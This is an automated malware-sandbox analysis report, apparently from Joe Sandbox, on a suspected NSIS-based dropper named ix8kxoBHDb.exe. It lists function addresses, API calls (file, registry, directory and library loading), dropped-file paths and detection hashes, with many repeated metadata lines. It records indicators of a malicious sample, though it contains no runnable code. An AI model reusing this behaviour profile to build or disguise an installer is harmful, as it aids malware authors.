Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll
API String ID: 2531174081-1911264580
Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

\, xrefs: 0040677A
%s%S.dll, xrefs: 0040679E
UXTHEME, xrefs: 0040675B

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 0040591F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040591F

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-4267323751
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 00405F0D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\ix8kxoBHDb.exe",004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F12, 00405F16
"C:\Users\user\Desktop\ix8kxoBHDb.exe", xrefs: 00405F0D

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1366144971
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 73B01777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73B01B5F: GlobalFree.KERNEL32(?), ref: 73B01DB2
Part of subcall function 73B01B5F: GlobalFree.KERNEL32(?), ref: 73B01DB7
Part of subcall function 73B01B5F: GlobalFree.KERNEL32(?), ref: 73B01DBC

GlobalFree.KERNEL32(00000000), ref: 73B01825
FreeLibrary.KERNEL32(?), ref: 73B018AB
GlobalFree.KERNEL32(00000000), ref: 73B018D0

Part of subcall function 73B02352: GlobalAlloc.KERNEL32(00000040,?), ref: 73B02383

Part of subcall function 73B02724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73B017F6,00000000), ref: 73B027F4

Part of subcall function 73B015C6: wsprintfW.USER32 ref: 73B015F4

Strings

, xrefs: 73B018B1

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 60a16e74f866e9e5a70fce5183a4eefb2234932a1e3c515c62e21d0cbae301ce
Instruction ID: 6d121c78663f9c139a3f4e37260f3f13d48122d751ebbdd8aee2f62c76321b6a
Opcode Fuzzy Hash: 60a16e74f866e9e5a70fce5183a4eefb2234932a1e3c515c62e21d0cbae301ce
Instruction Fuzzy Hash: 974193B94003089BEB199F749AC4B993FACFB44354F184575E94B9E5C6FB78C248CB60

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp, xrefs: 00402420, 0040242E, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp
API String ID: 2655323295-3418755209
Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,756F2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker, xrefs: 00401640

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker
API String ID: 1892508949-1454378569
Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D

Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
RegCloseKey.KERNELBASE(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrD4CF.tmp\System.dll), ref: 00406307

Strings

Call, xrefs: 004062BD

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
